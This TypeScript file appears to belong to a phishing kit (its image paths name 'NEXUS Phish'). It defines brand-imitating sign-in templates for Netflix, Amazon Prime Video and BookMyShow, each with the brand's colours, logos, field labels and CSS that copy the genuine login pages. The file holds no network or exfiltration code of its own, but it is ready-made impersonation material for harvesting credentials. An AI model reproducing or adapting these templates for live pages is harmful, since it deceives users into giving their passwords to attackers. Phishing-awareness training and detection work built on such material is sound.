import { Music, Gamepad2, Ticket, GalleryVerticalEnd, Tv, Video } from "lucide-react";
import { LoginTemplate } from "./types";

export const entertainmentTemplates: LoginTemplate[] = [
  {
    id: "netflix",
    name: "Netflix",
    description: "Sign In to Netflix",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/netflix.png?updatedAt=1744038345925",
    primaryColor: "#E50914",
    secondaryColor: "#ffffff",
    backgroundColor: "#000000",
    usernameLabel: "Email or phone number",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign In",
    forgotPasswordText: "Forgot password?",
    signupText: "Sign up now",
    additionalOptions: [
      { text: "Remember me", url: "#", isCheckbox: true },
      { text: "Use a sign-in code", url: "#" }
    ],
    customCSS: `
      body {
        background-color: #000;
      }
      .netflix-bg {
        background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.5) 100%), url('https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/netflix%20bg.jpg?updatedAt=1744038701841');
        background-size: cover;
        background-position: center;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        z-index: -1;
      }
      .netflix-logo {
        height: 55px;
        margin: 25px 50px;
        position: absolute;
        top: 0;
        left: 0;
      }
      .netflix-login {
        max-width: 450px;
        background-color: rgba(0, 0, 0, 0.75);
        border-radius: 4px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        padding: 60px 68px 40px;
        color: white;
        margin: 0 auto;
      }
      .netflix-title {
        font-size: 32px;
        font-weight: 500;
        margin-bottom: 28px;
        color: #fff;
      }
      .netflix-input {
        background-color: #333 !important;
        border: none !important;
        border-radius: 4px !important;
        color: #fff !important;
        height: 50px !important;
        line-height: 50px !important;
        padding: 0 20px !important;
        margin-bottom: 16px !important;
        width: 100% !important;
      }
      .netflix-input:focus {
        background-color: #454545 !important;
        outline: none !important;
      }
      .netflix-btn {
        border-radius: 4px !important;
        font-size: 16px !important;
        font-weight: 500 !important;
        margin: 24px 0 12px !important;
        padding: 16px !important;
        background-color: #E50914 !important;
        color: white !important;
        width: 100% !important;
      }
      .netflix-btn:hover {
        background-color: #f6121d !important;
      }
      .netflix-remember {
        display: flex;
        align-items: center;
        justify-content: space-between;
        font-size: 13px;
        color: #b3b3b3;
        margin-bottom: 16px;
      }
      .netflix-forgot {
        color: #b3b3b3;
        text-decoration: none;
      }
      .netflix-forgot:hover {
        text-decoration: underline;
      }
      .netflix-signup {
        color: #737373;
        font-size: 16px;
        font-weight: 400;
        margin-top: 16px;
      }
      .netflix-signup-now {
        color: #fff;
        text-decoration: none;
        font-weight: 400;
      }
      .netflix-signup-now:hover {
        text-decoration: underline;
      }
      .netflix-separator {
        text-align: center;
        position: relative;
        margin: 8px 0;
        color: #737373;
        font-size: 14px;
        font-weight: 400;
      }
      .netflix-secondary-btn {
        background-color: rgba(45, 45, 45, 0.7);
        color: #737373;
        border: none;
        width: 100%;
        padding: 16px;
        text-align: center;
        font-weight: 500;
        font-size: 15px;
        border-radius: 4px;
        margin-top: 16px;
        margin-bottom: 12px;
        cursor: pointer;
      }
      .netflix-secondary-btn:hover {
        background-color: rgba(45, 45, 45, 0.8);
      }
      .netflix-recaptcha {
        font-size: 13px;
        color: #8c8c8c;
        margin-top: 11px;
      }
      .netflix-recaptcha a {
        color: #0071eb;
      }
      .netflix-recaptcha a:hover {
        text-decoration: underline;
      }
    `,
    category: "entertainment"
  },
  {
    id: "prime",
    name: "Amazon Prime",
    description: "Sign in to Amazon Prime Video",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/Amazon%20Prime.png?updatedAt=1742183447951",
    primaryColor: "#00A8E1",
    secondaryColor: "#232F3E",
    backgroundColor: "#0F171E",
    usernameLabel: "Email or mobile phone number",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign In",
    forgotPasswordText: "Forgot your password?",
    signupText: "New to Amazon? Create your Amazon account",
    additionalOptions: [
      { text: "Keep me signed in", url: "#", isCheckbox: true }
    ],
    customCSS: `
      .prime-login {
        max-width: 350px;
        background-color: white;
        border-radius: 4px;
        padding: 20px 26px;
      }
      .prime-logo {
        height: 31px;
        margin-bottom: 18px;
      }
      .prime-title {
        font-size: 28px;
        font-weight: 400;
        margin-bottom: 10px;
      }
      .prime-input-label {
        font-weight: 700;
        font-size: 13px;
        padding-left: 2px;
        padding-bottom: 2px;
      }
      .prime-input {
        border: 1px solid #a6a6a6;
        border-radius: 3px;
        height: 31px;
        padding: 3px 7px;
        box-shadow: 0 1px 0 rgba(255,255,255,.5), 0 1px 0 rgba(0,0,0,.07) inset;
      }
      .prime-input:focus {
        border-color: #e77600;
        box-shadow: 0 0 3px 2px rgba(228,121,17,.5);
      }
      .prime-btn {
        border-radius: 3px;
        font-size: 14px;
        padding: 6px 0;
        width: 100%;
        background: linear-gradient(to bottom, #f7dfa5, #f0c14b);
        border-color: #a88734 #9c7e31 #846a29;
        color: #111;
      }
      .prime-btn:hover {
        background: linear-gradient(to bottom, #f5d78e, #eeb933);
      }
      .prime-checkbox {
        font-size: 13px;
      }
      .prime-forgot {
        font-size: 13px;
        color: #0066c0;
      }
      .prime-separator {
        text-align: center;
        position: relative;
        margin: 25px 0;
      }
      .prime-separator:before {
        content: '';
        position: absolute;
        top: 50%;
        left: 0;
        right: 0;
        border-top: 1px solid #e7e7e7;
      }
      .prime-separator-text {
        position: relative;
        display: inline-block;
        background-color: white;
        padding: 0 8px;
        color: #767676;
        font-size: 12px;
      }
      .prime-signup {
        text-align: center;
        font-size: 13px;
      }
      .prime-signup-btn {
        border-radius: 3px;
        font-size: 13px;
        padding: 6px 0;
        width: 100%;
        background: linear-gradient(to bottom, #f7f8fa, #e7e9ec);
        border-color: #adb1b8 #a2a6ac #8d9096;
        color: #111;
        margin-top: 10px;
      }
      .prime-signup-btn:hover {
        background: linear-gradient(to bottom, #e7eaf0, #d9dce1);
      }
      .prime-bg {
        background-color: #fff;
      }
    `,
    category: "entertainment"
  },
  {
    id: "bookmyshow",
    name: "BookMyShow",
    description: "Sign in to BookMyShow",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/Book%20my%20show.png?updatedAt=1742183447735",
    primaryColor: "#D70000",
    secondaryColor: "#222222",
    backgroundColor: "#FFFFFF",
    usernameLabel: "Email ID/Mobile Number",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot Password?",
    signupText: "New user? Sign up",
    additionalOptions: [
      { text: "Continue with Google", url: "#" },
      { text: "Continue with Facebook", url: "#" }
    ],
    customCSS: `
      .bms-login {
        max-width: 400px;
        background-color: white;
        border-radius: 8px;
        box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
        padding: 30px;
      }
      .bms-logo {
        height: 35px;
        margin-bottom: 24px;
      }
      .bms-title {
        font-size: 22px;
        font-weight: 700;
        color: #333;
        margin-bottom: 16px;
      }
      .bms-input {
        border: 1px solid #e5e5e5;
        border-radius: 8px;
        padding: 12px 16px;
        width: 100%;
        margin-bottom: 16px;
      }
      .bms-input:focus {
        border-color: #D70000;
      }
      .bms-btn {
        background-color: #D70000;
        border-radius: 8px;
        color: white;
        font-weight: 600;
        padding: 12px 0;
        width: 100%;
      }
      .bms-btn:hover {
        background-color: #c00000;
      }
      .bms-forgot {
        text-align: center;
        color: #333;
        font-size: 14px;
        margin-top: 16px;
      }
      .bms-separator {
        display: flex;
        align-items: center;
        margin: 20px 0;
      }
      .bms-separator-line {
        flex-grow: 1;
        height: 1px;
        background-color: #e5e5e5;
      }
      .bms-separator-text {
        padding: 0 16px;
        color: #999;
        font-size: 14px;
      }
      .bms-social {
        display: flex;
        flex-direction: column;
        gap: 10px;
      }
      .bms-social-btn {
        background-color: white;
        border: 1px solid #e5e5e5;
        border-radius: 8px;
        padding: 10px 0;
        font-size: 14px;
        font-weight: 600;
        color: #333;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      .bms-social-btn:hover {
        background-color: #f9f9f9;
      }
      .bms-social-icon {
        margin-right: 8px;
      }
      .bms-signup {
        margin-top: 20px;
        text-align: center;
        font-size: 14px;
        color: #666;
      }
      .bms-signup-btn {
        color: #D70000;
        font-weight: 600;
        text-decoration: none;
      }
      .bms-bg {
        background-color: #f5f5fa;
      }
    `,
    category: "entertainment"
  }
];